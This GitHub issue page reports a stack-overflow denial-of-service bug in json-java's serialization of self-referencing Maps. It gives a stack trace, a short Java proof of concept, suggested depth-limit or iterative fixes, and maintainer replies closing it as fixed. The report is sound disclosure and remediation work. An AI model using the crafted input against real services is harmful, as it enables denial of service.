JSON-java icon indicating copy to clipboard operation
JSON-java copied to clipboard

Published 20 hours ago verified publisher icon stleary

Stack overflow error caused by json-java serialization Map

Open PoppingSnack opened this issue 2 years ago • 2 comments

Stack overflow error caused by json-java serialization Map

Description

json-java before v20230227 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at org.json.JSONObject.<init>(JSONObject.java:284)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)

PoC

        <dependency>
            <groupId>org.json</groupId>
            <artifactId>json</artifactId>
            <version>20230227</version>
        </dependency>

import org.json.JSONObject;

import java.util.HashMap;

public class PoC2 {

    public static void main(String[] args) {
        HashMap<String,Object> map=new HashMap<>();
        map.put("t",map);
        JSONObject jsonObject = new JSONObject(map);
        String jsonString = jsonObject.toString();
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027))

References

  1. https://github.com/jettison-json/jettison/issues/52
  2. https://github.com/jettison-json/jettison/pull/53/files

PoppingSnack avatar Jun 08 '23 07:06 PoppingSnack

#720 and #723 might provide an example of how to fix this for JSONObject.

stleary avatar Jun 08 '23 12:06 stleary

Related to #701 ?

mccartney avatar Sep 30 '23 19:09 mccartney

Closed due to issue fixed in another commit.

stleary avatar Jan 20 '25 17:01 stleary